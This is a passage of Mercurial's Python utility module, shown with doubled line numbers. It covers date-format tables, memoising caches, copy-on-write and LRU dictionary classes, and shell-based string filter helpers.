564 return (vints[0], vints[1], vints[2])
564 if n == 4:
565 if n == 4:
565 return (vints[0], vints[1], vints[2], extra)
566 return (vints[0], vints[1], vints[2], extra)
566
567
567 # used by parsedate
568 # used by parsedate
568 defaultdateformats = (
569 defaultdateformats = (
569 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
570 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
570 '%Y-%m-%dT%H:%M', # without seconds
571 '%Y-%m-%dT%H:%M', # without seconds
571 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
572 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
572 '%Y-%m-%dT%H%M', # without seconds
573 '%Y-%m-%dT%H%M', # without seconds
573 '%Y-%m-%d %H:%M:%S', # our common legal variant
574 '%Y-%m-%d %H:%M:%S', # our common legal variant
574 '%Y-%m-%d %H:%M', # without seconds
575 '%Y-%m-%d %H:%M', # without seconds
575 '%Y-%m-%d %H%M%S', # without :
576 '%Y-%m-%d %H%M%S', # without :
576 '%Y-%m-%d %H%M', # without seconds
577 '%Y-%m-%d %H%M', # without seconds
577 '%Y-%m-%d %I:%M:%S%p',
578 '%Y-%m-%d %I:%M:%S%p',
578 '%Y-%m-%d %H:%M',
579 '%Y-%m-%d %H:%M',
579 '%Y-%m-%d %I:%M%p',
580 '%Y-%m-%d %I:%M%p',
580 '%Y-%m-%d',
581 '%Y-%m-%d',
581 '%m-%d',
582 '%m-%d',
582 '%m/%d',
583 '%m/%d',
583 '%m/%d/%y',
584 '%m/%d/%y',
584 '%m/%d/%Y',
585 '%m/%d/%Y',
585 '%a %b %d %H:%M:%S %Y',
586 '%a %b %d %H:%M:%S %Y',
586 '%a %b %d %I:%M:%S%p %Y',
587 '%a %b %d %I:%M:%S%p %Y',
587 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
588 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
588 '%b %d %H:%M:%S %Y',
589 '%b %d %H:%M:%S %Y',
589 '%b %d %I:%M:%S%p %Y',
590 '%b %d %I:%M:%S%p %Y',
590 '%b %d %H:%M:%S',
591 '%b %d %H:%M:%S',
591 '%b %d %I:%M:%S%p',
592 '%b %d %I:%M:%S%p',
592 '%b %d %H:%M',
593 '%b %d %H:%M',
593 '%b %d %I:%M%p',
594 '%b %d %I:%M%p',
594 '%b %d %Y',
595 '%b %d %Y',
595 '%b %d',
596 '%b %d',
596 '%H:%M:%S',
597 '%H:%M:%S',
597 '%I:%M:%S%p',
598 '%I:%M:%S%p',
598 '%H:%M',
599 '%H:%M',
599 '%I:%M%p',
600 '%I:%M%p',
600 )
601 )
601
602
602 extendeddateformats = defaultdateformats + (
603 extendeddateformats = defaultdateformats + (
603 "%Y",
604 "%Y",
604 "%Y-%m",
605 "%Y-%m",
605 "%b",
606 "%b",
606 "%b %Y",
607 "%b %Y",
607 )
608 )
608
609
609 def cachefunc(func):
610 def cachefunc(func):
610 '''cache the result of function calls'''
611 '''cache the result of function calls'''
611 # XXX doesn't handle keywords args
612 # XXX doesn't handle keywords args
612 if func.__code__.co_argcount == 0:
613 if func.__code__.co_argcount == 0:
613 cache = []
614 cache = []
614 def f():
615 def f():
615 if len(cache) == 0:
616 if len(cache) == 0:
616 cache.append(func())
617 cache.append(func())
617 return cache[0]
618 return cache[0]
618 return f
619 return f
619 cache = {}
620 cache = {}
620 if func.__code__.co_argcount == 1:
621 if func.__code__.co_argcount == 1:
621 # we gain a small amount of time because
622 # we gain a small amount of time because
622 # we don't need to pack/unpack the list
623 # we don't need to pack/unpack the list
623 def f(arg):
624 def f(arg):
624 if arg not in cache:
625 if arg not in cache:
625 cache[arg] = func(arg)
626 cache[arg] = func(arg)
626 return cache[arg]
627 return cache[arg]
627 else:
628 else:
628 def f(*args):
629 def f(*args):
629 if args not in cache:
630 if args not in cache:
630 cache[args] = func(*args)
631 cache[args] = func(*args)
631 return cache[args]
632 return cache[args]
632
633
633 return f
634 return f
634
635
635 class cow(object):
636 class cow(object):
636 """helper class to make copy-on-write easier
637 """helper class to make copy-on-write easier
637
638
638 Call preparewrite before doing any writes.
639 Call preparewrite before doing any writes.
639 """
640 """
640
641
641 def preparewrite(self):
642 def preparewrite(self):
642 """call this before writes, return self or a copied new object"""
643 """call this before writes, return self or a copied new object"""
643 if getattr(self, '_copied', 0):
644 if getattr(self, '_copied', 0):
644 self._copied -= 1
645 self._copied -= 1
645 return self.__class__(self)
646 return self.__class__(self)
646 return self
647 return self
647
648
648 def copy(self):
649 def copy(self):
649 """always do a cheap copy"""
650 """always do a cheap copy"""
650 self._copied = getattr(self, '_copied', 0) + 1
651 self._copied = getattr(self, '_copied', 0) + 1
651 return self
652 return self
652
653
653 class sortdict(collections.OrderedDict):
654 class sortdict(collections.OrderedDict):
654 '''a simple sorted dictionary
655 '''a simple sorted dictionary
655
656
656 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
657 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
657 >>> d2 = d1.copy()
658 >>> d2 = d1.copy()
658 >>> d2
659 >>> d2
659 sortdict([('a', 0), ('b', 1)])
660 sortdict([('a', 0), ('b', 1)])
660 >>> d2.update([(b'a', 2)])
661 >>> d2.update([(b'a', 2)])
661 >>> list(d2.keys()) # should still be in last-set order
662 >>> list(d2.keys()) # should still be in last-set order
662 ['b', 'a']
663 ['b', 'a']
663 '''
664 '''
664
665
665 def __setitem__(self, key, value):
666 def __setitem__(self, key, value):
666 if key in self:
667 if key in self:
667 del self[key]
668 del self[key]
668 super(sortdict, self).__setitem__(key, value)
669 super(sortdict, self).__setitem__(key, value)
669
670
670 if pycompat.ispypy:
671 if pycompat.ispypy:
671 # __setitem__() isn't called as of PyPy 5.8.0
672 # __setitem__() isn't called as of PyPy 5.8.0
672 def update(self, src):
673 def update(self, src):
673 if isinstance(src, dict):
674 if isinstance(src, dict):
674 src = src.iteritems()
675 src = src.iteritems()
675 for k, v in src:
676 for k, v in src:
676 self[k] = v
677 self[k] = v
677
678
678 class cowdict(cow, dict):
679 class cowdict(cow, dict):
679 """copy-on-write dict
680 """copy-on-write dict
680
681
681 Be sure to call d = d.preparewrite() before writing to d.
682 Be sure to call d = d.preparewrite() before writing to d.
682
683
683 >>> a = cowdict()
684 >>> a = cowdict()
684 >>> a is a.preparewrite()
685 >>> a is a.preparewrite()
685 True
686 True
686 >>> b = a.copy()
687 >>> b = a.copy()
687 >>> b is a
688 >>> b is a
688 True
689 True
689 >>> c = b.copy()
690 >>> c = b.copy()
690 >>> c is a
691 >>> c is a
691 True
692 True
692 >>> a = a.preparewrite()
693 >>> a = a.preparewrite()
693 >>> b is a
694 >>> b is a
694 False
695 False
695 >>> a is a.preparewrite()
696 >>> a is a.preparewrite()
696 True
697 True
697 >>> c = c.preparewrite()
698 >>> c = c.preparewrite()
698 >>> b is c
699 >>> b is c
699 False
700 False
700 >>> b is b.preparewrite()
701 >>> b is b.preparewrite()
701 True
702 True
702 """
703 """
703
704
704 class cowsortdict(cow, sortdict):
705 class cowsortdict(cow, sortdict):
705 """copy-on-write sortdict
706 """copy-on-write sortdict
706
707
707 Be sure to call d = d.preparewrite() before writing to d.
708 Be sure to call d = d.preparewrite() before writing to d.
708 """
709 """
709
710
710 class transactional(object):
711 class transactional(object):
711 """Base class for making a transactional type into a context manager."""
712 """Base class for making a transactional type into a context manager."""
712 __metaclass__ = abc.ABCMeta
713 __metaclass__ = abc.ABCMeta
713
714
714 @abc.abstractmethod
715 @abc.abstractmethod
715 def close(self):
716 def close(self):
716 """Successfully closes the transaction."""
717 """Successfully closes the transaction."""
717
718
718 @abc.abstractmethod
719 @abc.abstractmethod
719 def release(self):
720 def release(self):
720 """Marks the end of the transaction.
721 """Marks the end of the transaction.
721
722
722 If the transaction has not been closed, it will be aborted.
723 If the transaction has not been closed, it will be aborted.
723 """
724 """
724
725
725 def __enter__(self):
726 def __enter__(self):
726 return self
727 return self
727
728
728 def __exit__(self, exc_type, exc_val, exc_tb):
729 def __exit__(self, exc_type, exc_val, exc_tb):
729 try:
730 try:
730 if exc_type is None:
731 if exc_type is None:
731 self.close()
732 self.close()
732 finally:
733 finally:
733 self.release()
734 self.release()
734
735
735 @contextlib.contextmanager
736 @contextlib.contextmanager
736 def acceptintervention(tr=None):
737 def acceptintervention(tr=None):
737 """A context manager that closes the transaction on InterventionRequired
738 """A context manager that closes the transaction on InterventionRequired
738
739
739 If no transaction was provided, this simply runs the body and returns
740 If no transaction was provided, this simply runs the body and returns
740 """
741 """
741 if not tr:
742 if not tr:
742 yield
743 yield
743 return
744 return
744 try:
745 try:
745 yield
746 yield
746 tr.close()
747 tr.close()
747 except error.InterventionRequired:
748 except error.InterventionRequired:
748 tr.close()
749 tr.close()
749 raise
750 raise
750 finally:
751 finally:
751 tr.release()
752 tr.release()
752
753
753 @contextlib.contextmanager
754 @contextlib.contextmanager
754 def nullcontextmanager():
755 def nullcontextmanager():
755 yield
756 yield
756
757
757 class _lrucachenode(object):
758 class _lrucachenode(object):
758 """A node in a doubly linked list.
759 """A node in a doubly linked list.
759
760
760 Holds a reference to nodes on either side as well as a key-value
761 Holds a reference to nodes on either side as well as a key-value
761 pair for the dictionary entry.
762 pair for the dictionary entry.
762 """
763 """
763 __slots__ = (u'next', u'prev', u'key', u'value')
764 __slots__ = (u'next', u'prev', u'key', u'value')
764
765
765 def __init__(self):
766 def __init__(self):
766 self.next = None
767 self.next = None
767 self.prev = None
768 self.prev = None
768
769
769 self.key = _notset
770 self.key = _notset
770 self.value = None
771 self.value = None
771
772
772 def markempty(self):
773 def markempty(self):
773 """Mark the node as emptied."""
774 """Mark the node as emptied."""
774 self.key = _notset
775 self.key = _notset
775
776
776 class lrucachedict(object):
777 class lrucachedict(object):
777 """Dict that caches most recent accesses and sets.
778 """Dict that caches most recent accesses and sets.
778
779
779 The dict consists of an actual backing dict - indexed by original
780 The dict consists of an actual backing dict - indexed by original
780 key - and a doubly linked circular list defining the order of entries in
781 key - and a doubly linked circular list defining the order of entries in
781 the cache.
782 the cache.
782
783
783 The head node is the newest entry in the cache. If the cache is full,
784 The head node is the newest entry in the cache. If the cache is full,
784 we recycle head.prev and make it the new head. Cache accesses result in
785 we recycle head.prev and make it the new head. Cache accesses result in
785 the node being moved to before the existing head and being marked as the
786 the node being moved to before the existing head and being marked as the
786 new head node.
787 new head node.
787 """
788 """
788 def __init__(self, max):
789 def __init__(self, max):
789 self._cache = {}
790 self._cache = {}
790
791
791 self._head = head = _lrucachenode()
792 self._head = head = _lrucachenode()
792 head.prev = head
793 head.prev = head
793 head.next = head
794 head.next = head
794 self._size = 1
795 self._size = 1
795 self._capacity = max
796 self._capacity = max
796
797
797 def __len__(self):
798 def __len__(self):
798 return len(self._cache)
799 return len(self._cache)
799
800
800 def __contains__(self, k):
801 def __contains__(self, k):
801 return k in self._cache
802 return k in self._cache
802
803
803 def __iter__(self):
804 def __iter__(self):
804 # We don't have to iterate in cache order, but why not.
805 # We don't have to iterate in cache order, but why not.
805 n = self._head
806 n = self._head
806 for i in range(len(self._cache)):
807 for i in range(len(self._cache)):
807 yield n.key
808 yield n.key
808 n = n.next
809 n = n.next
809
810
810 def __getitem__(self, k):
811 def __getitem__(self, k):
811 node = self._cache[k]
812 node = self._cache[k]
812 self._movetohead(node)
813 self._movetohead(node)
813 return node.value
814 return node.value
814
815
815 def __setitem__(self, k, v):
816 def __setitem__(self, k, v):
816 node = self._cache.get(k)
817 node = self._cache.get(k)
817 # Replace existing value and mark as newest.
818 # Replace existing value and mark as newest.
818 if node is not None:
819 if node is not None:
819 node.value = v
820 node.value = v
820 self._movetohead(node)
821 self._movetohead(node)
821 return
822 return
822
823
823 if self._size < self._capacity:
824 if self._size < self._capacity:
824 node = self._addcapacity()
825 node = self._addcapacity()
825 else:
826 else:
826 # Grab the last/oldest item.
827 # Grab the last/oldest item.
827 node = self._head.prev
828 node = self._head.prev
828
829
829 # At capacity. Kill the old entry.
830 # At capacity. Kill the old entry.
830 if node.key is not _notset:
831 if node.key is not _notset:
831 del self._cache[node.key]
832 del self._cache[node.key]
832
833
833 node.key = k
834 node.key = k
834 node.value = v
835 node.value = v
835 self._cache[k] = node
836 self._cache[k] = node
836 # And mark it as newest entry. No need to adjust order since it
837 # And mark it as newest entry. No need to adjust order since it
837 # is already self._head.prev.
838 # is already self._head.prev.
838 self._head = node
839 self._head = node
839
840
840 def __delitem__(self, k):
841 def __delitem__(self, k):
841 node = self._cache.pop(k)
842 node = self._cache.pop(k)
842 node.markempty()
843 node.markempty()
843
844
844 # Temporarily mark as newest item before re-adjusting head to make
845 # Temporarily mark as newest item before re-adjusting head to make
845 # this node the oldest item.
846 # this node the oldest item.
846 self._movetohead(node)
847 self._movetohead(node)
847 self._head = node.next
848 self._head = node.next
848
849
849 # Additional dict methods.
850 # Additional dict methods.
850
851
851 def get(self, k, default=None):
852 def get(self, k, default=None):
852 try:
853 try:
853 return self._cache[k].value
854 return self._cache[k].value
854 except KeyError:
855 except KeyError:
855 return default
856 return default
856
857
857 def clear(self):
858 def clear(self):
858 n = self._head
859 n = self._head
859 while n.key is not _notset:
860 while n.key is not _notset:
860 n.markempty()
861 n.markempty()
861 n = n.next
862 n = n.next
862
863
863 self._cache.clear()
864 self._cache.clear()
864
865
865 def copy(self):
866 def copy(self):
866 result = lrucachedict(self._capacity)
867 result = lrucachedict(self._capacity)
867 n = self._head.prev
868 n = self._head.prev
868 # Iterate in oldest-to-newest order, so the copy has the right ordering
869 # Iterate in oldest-to-newest order, so the copy has the right ordering
869 for i in range(len(self._cache)):
870 for i in range(len(self._cache)):
870 result[n.key] = n.value
871 result[n.key] = n.value
871 n = n.prev
872 n = n.prev
872 return result
873 return result
873
874
874 def _movetohead(self, node):
875 def _movetohead(self, node):
875 """Mark a node as the newest, making it the new head.
876 """Mark a node as the newest, making it the new head.
876
877
877 When a node is accessed, it becomes the freshest entry in the LRU
878 When a node is accessed, it becomes the freshest entry in the LRU
878 list, which is denoted by self._head.
879 list, which is denoted by self._head.
879
880
880 Visually, let's make ``N`` the new head node (* denotes head):
881 Visually, let's make ``N`` the new head node (* denotes head):
881
882
882 previous/oldest <-> head <-> next/next newest
883 previous/oldest <-> head <-> next/next newest
883
884
884 ----<->--- A* ---<->-----
885 ----<->--- A* ---<->-----
885 | |
886 | |
886 E <-> D <-> N <-> C <-> B
887 E <-> D <-> N <-> C <-> B
887
888
888 To:
889 To:
889
890
890 ----<->--- N* ---<->-----
891 ----<->--- N* ---<->-----
891 | |
892 | |
892 E <-> D <-> C <-> B <-> A
893 E <-> D <-> C <-> B <-> A
893
894
894 This requires the following moves:
895 This requires the following moves:
895
896
896 C.next = D (node.prev.next = node.next)
897 C.next = D (node.prev.next = node.next)
897 D.prev = C (node.next.prev = node.prev)
898 D.prev = C (node.next.prev = node.prev)
898 E.next = N (head.prev.next = node)
899 E.next = N (head.prev.next = node)
899 N.prev = E (node.prev = head.prev)
900 N.prev = E (node.prev = head.prev)
900 N.next = A (node.next = head)
901 N.next = A (node.next = head)
901 A.prev = N (head.prev = node)
902 A.prev = N (head.prev = node)
902 """
903 """
903 head = self._head
904 head = self._head
904 # C.next = D
905 # C.next = D
905 node.prev.next = node.next
906 node.prev.next = node.next
906 # D.prev = C
907 # D.prev = C
907 node.next.prev = node.prev
908 node.next.prev = node.prev
908 # N.prev = E
909 # N.prev = E
909 node.prev = head.prev
910 node.prev = head.prev
910 # N.next = A
911 # N.next = A
911 # It is tempting to do just "head" here, however if node is
912 # It is tempting to do just "head" here, however if node is
912 # adjacent to head, this will do bad things.
913 # adjacent to head, this will do bad things.
913 node.next = head.prev.next
914 node.next = head.prev.next
914 # E.next = N
915 # E.next = N
915 node.next.prev = node
916 node.next.prev = node
916 # A.prev = N
917 # A.prev = N
917 node.prev.next = node
918 node.prev.next = node
918
919
919 self._head = node
920 self._head = node
920
921
921 def _addcapacity(self):
922 def _addcapacity(self):
922 """Add a node to the circular linked list.
923 """Add a node to the circular linked list.
923
924
924 The new node is inserted before the head node.
925 The new node is inserted before the head node.
925 """
926 """
926 head = self._head
927 head = self._head
927 node = _lrucachenode()
928 node = _lrucachenode()
928 head.prev.next = node
929 head.prev.next = node
929 node.prev = head.prev
930 node.prev = head.prev
930 node.next = head
931 node.next = head
931 head.prev = node
932 head.prev = node
932 self._size += 1
933 self._size += 1
933 return node
934 return node
934
935
935 def lrucachefunc(func):
936 def lrucachefunc(func):
936 '''cache most recent results of function calls'''
937 '''cache most recent results of function calls'''
937 cache = {}
938 cache = {}
938 order = collections.deque()
939 order = collections.deque()
939 if func.__code__.co_argcount == 1:
940 if func.__code__.co_argcount == 1:
940 def f(arg):
941 def f(arg):
941 if arg not in cache:
942 if arg not in cache:
942 if len(cache) > 20:
943 if len(cache) > 20:
943 del cache[order.popleft()]
944 del cache[order.popleft()]
944 cache[arg] = func(arg)
945 cache[arg] = func(arg)
945 else:
946 else:
946 order.remove(arg)
947 order.remove(arg)
947 order.append(arg)
948 order.append(arg)
948 return cache[arg]
949 return cache[arg]
949 else:
950 else:
950 def f(*args):
951 def f(*args):
951 if args not in cache:
952 if args not in cache:
952 if len(cache) > 20:
953 if len(cache) > 20:
953 del cache[order.popleft()]
954 del cache[order.popleft()]
954 cache[args] = func(*args)
955 cache[args] = func(*args)
955 else:
956 else:
956 order.remove(args)
957 order.remove(args)
957 order.append(args)
958 order.append(args)
958 return cache[args]
959 return cache[args]
959
960
960 return f
961 return f
961
962
962 class propertycache(object):
963 class propertycache(object):
963 def __init__(self, func):
964 def __init__(self, func):
964 self.func = func
965 self.func = func
965 self.name = func.__name__
966 self.name = func.__name__
966 def __get__(self, obj, type=None):
967 def __get__(self, obj, type=None):
967 result = self.func(obj)
968 result = self.func(obj)
968 self.cachevalue(obj, result)
969 self.cachevalue(obj, result)
969 return result
970 return result
970
971
971 def cachevalue(self, obj, value):
972 def cachevalue(self, obj, value):
972 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
973 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
973 obj.__dict__[self.name] = value
974 obj.__dict__[self.name] = value
974
975
975 def clearcachedproperty(obj, prop):
976 def clearcachedproperty(obj, prop):
976 '''clear a cached property value, if one has been set'''
977 '''clear a cached property value, if one has been set'''
977 if prop in obj.__dict__:
978 if prop in obj.__dict__:
978 del obj.__dict__[prop]
979 del obj.__dict__[prop]
979
980
980 def pipefilter(s, cmd):
981 def pipefilter(s, cmd):
981 '''filter string S through command CMD, returning its output'''
982 '''filter string S through command CMD, returning its output'''
982 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
983 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
983 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
984 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
984 pout, perr = p.communicate(s)
985 pout, perr = p.communicate(s)
985 return pout
986 return pout
986
987
987 def tempfilter(s, cmd):
988 def tempfilter(s, cmd):
988 '''filter string S through a pair of temporary files with CMD.
989 '''filter string S through a pair of temporary files with CMD.
989 CMD is used as a template to create the real command to be run,
990 CMD is used as a template to create the real command to be run,
990 with the strings INFILE and OUTFILE replaced by the real names of
991 with the strings INFILE and OUTFILE replaced by the real names of
991 the temporary files generated.'''
992 the temporary files generated.'''
992 inname, outname = None, None
993 inname, outname = None, None
993 try:
994 try:
994 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
995 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
995 fp = os.fdopen(infd, pycompat.sysstr('wb'))
996 fp = os.fdopen(infd, pycompat.sysstr('wb'))
996 fp.write(s)
997 fp.write(s)
997 fp.close()
998 fp.close()
998 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
999 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
999 os.close(outfd)
1000 os.close(outfd)
1000 cmd = cmd.replace('INFILE', inname)
1001 cmd = cmd.replace('INFILE', inname)
1001 cmd = cmd.replace('OUTFILE', outname)
1002 cmd = cmd.replace('OUTFILE', outname)
1002 code = os.system(cmd)
1003 code = os.system(cmd)
1003 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1004 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1004 code = 0
1005 code = 0
1005 if code:
1006 if code:
1006 raise Abort(_("command '%s' failed: %s") %
1007 raise Abort(_("command '%s' failed: %s") %
1007 (cmd, explainexit(code)))
1008 (cmd, explainexit(code)))
1008 return readfile(outname)
1009 return readfile(outname)
1009 finally:
1010 finally:
1010 try:
1011 try:
1011 if inname:
1012 if inname:
1012 os.unlink(inname)
1013 os.unlink(inname)
1013 except OSError:
1014 except OSError:
1014 pass
1015 pass
1015 try:
1016 try:
1016 if outname:
1017 if outname:
1017 os.unlink(outname)
1018 os.unlink(outname)
1018 except OSError:
1019 except OSError:
1019 pass
1020 pass
1020
1021
1021 filtertable = {
1022 filtertable = {
1022 'tempfile:': tempfilter,
1023 'tempfile:': tempfilter,
1023 'pipe:': pipefilter,
1024 'pipe:': pipefilter,
1024 }
1025 }
1025
1026
1026 def filter(s, cmd):
1027 def filter(s, cmd):
1027 "filter a string through a command that transforms its input to its output"
1028 "filter a string through a command that transforms its input to its output"
1028 for name, fn in filtertable.iteritems():
1029 for name, fn in filtertable.iteritems():
1029 if cmd.startswith(name):
1030 if cmd.startswith(name):
1030 return fn(s, cmd[len(name):].lstrip())
1031 return fn(s, cmd[len(name):].lstrip())
1031 return pipefilter(s, cmd)
1032 return pipefilter(s, cmd)
1032
1033
1033 def binary(s):
1034 def binary(s):
1034 """return true if a string is binary data"""
1035 """return true if a string is binary data"""
1035 return bool(s and '\0' in s)
1036 return bool(s and '\0' in s)
1036
1037
1037 def increasingchunks(source, min=1024, max=65536):
1038 def increasingchunks(source, min=1024, max=65536):
1038 '''return no less than min bytes per chunk while data remains,
1039 '''return no less than min bytes per chunk while data remains,
1039 doubling min after each chunk until it reaches max'''
1040 doubling min after each chunk until it reaches max'''
1040 def log2(x):
1041 def log2(x):
1041 if not x:
1042 if not x:
1042 return 0
1043 return 0
1043 i = 0
1044 i = 0
1044 while x:
1045 while x:
1045 x >>= 1
1046 x >>= 1
1046 i += 1
1047 i += 1
1047 return i - 1
1048 return i - 1
1048
1049
1049 buf = []
1050 buf = []
1050 blen = 0
1051 blen = 0
1051 for chunk in source:
1052 for chunk in source:
1052 buf.append(chunk)
1053 buf.append(chunk)
1053 blen += len(chunk)
1054 blen += len(chunk)
1054 if blen >= min:
1055 if blen >= min:
1055 if min < max:
1056 if min < max:
1056 min = min << 1
1057 min = min << 1
1057 nmin = 1 << log2(blen)
1058 nmin = 1 << log2(blen)
1058 if nmin > min:
1059 if nmin > min:
1059 min = nmin
1060 min = nmin
1060 if min > max:
1061 if min > max:
1061 min = max
1062 min = max
1062 yield ''.join(buf)
1063 yield ''.join(buf)
1063 blen = 0
1064 blen = 0
1064 buf = []
1065 buf = []
1065 if buf:
1066 if buf:
1066 yield ''.join(buf)
1067 yield ''.join(buf)
1067
1068
1068 Abort = error.Abort
1069 Abort = error.Abort
1069
1070
1070 def always(fn):
1071 def always(fn):
1071 return True
1072 return True
1072
1073
1073 def never(fn):
1074 def never(fn):
1074 return False
1075 return False
1075
1076
1076 def nogc(func):
1077 def nogc(func):
1077 """disable garbage collector
1078 """disable garbage collector
1078
1079
1079 Python's garbage collector triggers a GC each time a certain number of
1080 Python's garbage collector triggers a GC each time a certain number of
1080 container objects (the number being defined by gc.get_threshold()) are
1081 container objects (the number being defined by gc.get_threshold()) are
1081 allocated even when marked not to be tracked by the collector. Tracking has
1082 allocated even when marked not to be tracked by the collector. Tracking has
1082 no effect on when GCs are triggered, only on what objects the GC looks
1083 no effect on when GCs are triggered, only on what objects the GC looks
1083 into. As a workaround, disable GC while building complex (huge)
1084 into. As a workaround, disable GC while building complex (huge)
1084 containers.
1085 containers.
1085
1086
1086 This garbage collector issue have been fixed in 2.7. But it still affect
1087 This garbage collector issue have been fixed in 2.7. But it still affect
1087 CPython's performance.
1088 CPython's performance.
1088 """
1089 """
1089 def wrapper(*args, **kwargs):
1090 def wrapper(*args, **kwargs):
1090 gcenabled = gc.isenabled()
1091 gcenabled = gc.isenabled()
1091 gc.disable()
1092 gc.disable()
1092 try:
1093 try:
1093 return func(*args, **kwargs)
1094 return func(*args, **kwargs)
1094 finally:
1095 finally:
1095 if gcenabled:
1096 if gcenabled:
1096 gc.enable()
1097 gc.enable()
1097 return wrapper
1098 return wrapper
1098
1099
1099 if pycompat.ispypy:
1100 if pycompat.ispypy:
1100 # PyPy runs slower with gc disabled
1101 # PyPy runs slower with gc disabled
1101 nogc = lambda x: x
1102 nogc = lambda x: x
1102
1103
1103 def pathto(root, n1, n2):
1104 def pathto(root, n1, n2):
1104 '''return the relative path from one place to another.
1105 '''return the relative path from one place to another.
1105 root should use os.sep to separate directories
1106 root should use os.sep to separate directories
1106 n1 should use os.sep to separate directories
1107 n1 should use os.sep to separate directories
1107 n2 should use "/" to separate directories
1108 n2 should use "/" to separate directories
1108 returns an os.sep-separated path.
1109 returns an os.sep-separated path.
1109
1110
1110 If n1 is a relative path, it's assumed it's
1111 If n1 is a relative path, it's assumed it's
1111 relative to root.
1112 relative to root.
1112 n2 should always be relative to root.
1113 n2 should always be relative to root.
1113 '''
1114 '''
1114 if not n1:
1115 if not n1:
1115 return localpath(n2)
1116 return localpath(n2)
1116 if os.path.isabs(n1):
1117 if os.path.isabs(n1):
1117 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1118 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1118 return os.path.join(root, localpath(n2))
1119 return os.path.join(root, localpath(n2))
1119 n2 = '/'.join((pconvert(root), n2))
1120 n2 = '/'.join((pconvert(root), n2))
1120 a, b = splitpath(n1), n2.split('/')
1121 a, b = splitpath(n1), n2.split('/')
1121 a.reverse()
1122 a.reverse()
1122 b.reverse()
1123 b.reverse()
1123 while a and b and a[-1] == b[-1]:
1124 while a and b and a[-1] == b[-1]:
1124 a.pop()
1125 a.pop()
1125 b.pop()
1126 b.pop()
1126 b.reverse()
1127 b.reverse()
1127 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1128 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1128
1129
1129 def mainfrozen():
1130 def mainfrozen():
1130 """return True if we are a frozen executable.
1131 """return True if we are a frozen executable.
1131
1132
1132 The code supports py2exe (most common, Windows only) and tools/freeze
1133 The code supports py2exe (most common, Windows only) and tools/freeze
1133 (portable, not much used).
1134 (portable, not much used).
1134 """
1135 """
1135 return (safehasattr(sys, "frozen") or # new py2exe
1136 return (safehasattr(sys, "frozen") or # new py2exe
1136 safehasattr(sys, "importers") or # old py2exe
1137 safehasattr(sys, "importers") or # old py2exe
1137 imp.is_frozen(u"__main__")) # tools/freeze
1138 imp.is_frozen(u"__main__")) # tools/freeze
1138
1139
1139 # the location of data files matching the source code
1140 # the location of data files matching the source code
1140 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1141 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1141 # executable version (py2exe) doesn't support __file__
1142 # executable version (py2exe) doesn't support __file__
1142 datapath = os.path.dirname(pycompat.sysexecutable)
1143 datapath = os.path.dirname(pycompat.sysexecutable)
1143 else:
1144 else:
1144 datapath = os.path.dirname(pycompat.fsencode(__file__))
1145 datapath = os.path.dirname(pycompat.fsencode(__file__))
1145
1146
1146 i18n.setdatapath(datapath)
1147 i18n.setdatapath(datapath)
1147
1148
1148 _hgexecutable = None
1149 _hgexecutable = None
1149
1150
1150 def hgexecutable():
1151 def hgexecutable():
1151 """return location of the 'hg' executable.
1152 """return location of the 'hg' executable.
1152
1153
1153 Defaults to $HG or 'hg' in the search path.
1154 Defaults to $HG or 'hg' in the search path.
1154 """
1155 """
1155 if _hgexecutable is None:
1156 if _hgexecutable is None:
1156 hg = encoding.environ.get('HG')
1157 hg = encoding.environ.get('HG')
1157 mainmod = sys.modules[pycompat.sysstr('__main__')]
1158 mainmod = sys.modules[pycompat.sysstr('__main__')]
1158 if hg:
1159 if hg:
1159 _sethgexecutable(hg)
1160 _sethgexecutable(hg)
1160 elif mainfrozen():
1161 elif mainfrozen():
1161 if getattr(sys, 'frozen', None) == 'macosx_app':
1162 if getattr(sys, 'frozen', None) == 'macosx_app':
1162 # Env variable set by py2app
1163 # Env variable set by py2app
1163 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1164 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1164 else:
1165 else:
1165 _sethgexecutable(pycompat.sysexecutable)
1166 _sethgexecutable(pycompat.sysexecutable)
1166 elif (os.path.basename(
1167 elif (os.path.basename(
1167 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1168 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1168 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1169 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1169 else:
1170 else:
1170 exe = findexe('hg') or os.path.basename(sys.argv[0])
1171 exe = findexe('hg') or os.path.basename(sys.argv[0])
1171 _sethgexecutable(exe)
1172 _sethgexecutable(exe)
1172 return _hgexecutable
1173 return _hgexecutable
1173
1174
1174 def _sethgexecutable(path):
1175 def _sethgexecutable(path):
1175 """set location of the 'hg' executable"""
1176 """set location of the 'hg' executable"""
1176 global _hgexecutable
1177 global _hgexecutable
1177 _hgexecutable = path
1178 _hgexecutable = path
1178
1179
1179 def _isstdout(f):
1180 def _isstdout(f):
1180 fileno = getattr(f, 'fileno', None)
1181 fileno = getattr(f, 'fileno', None)
